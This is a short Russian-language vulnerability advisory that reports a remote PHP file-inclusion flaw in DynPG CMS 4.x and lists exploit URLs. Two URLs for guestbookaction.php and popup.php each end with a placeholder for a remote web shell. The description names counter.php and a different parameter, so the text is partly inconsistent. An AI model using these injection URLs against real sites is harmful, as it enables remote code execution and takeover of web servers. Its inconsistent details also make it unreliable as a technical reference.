Программа: DynPG CMS 4.x
Уязвимость позволяет удаленному пользователю выполнить произвольный PHP
сценарий на целевой системе. Уязвимость существует из-за недостаточной обработки
входных данных в параметре "DefineRootToTool" сценарием counter.php (когда "inc"
установлен в любое значение). Удаленный пользователь может выполнить
произвольный PHP сценарий на целевой системе с привилегиями Web сервера.
Эксплоит:
http://127.0.0.1/DynPG_path/plugins/DPGguestbook/guestbookaction.php?PathToRoot=
[inject0r sh3ll]
http://127.0.0.1/DynPG_path/backendpopup/popup.php?get_popUpResource= [inj3ct0r
sh3ll]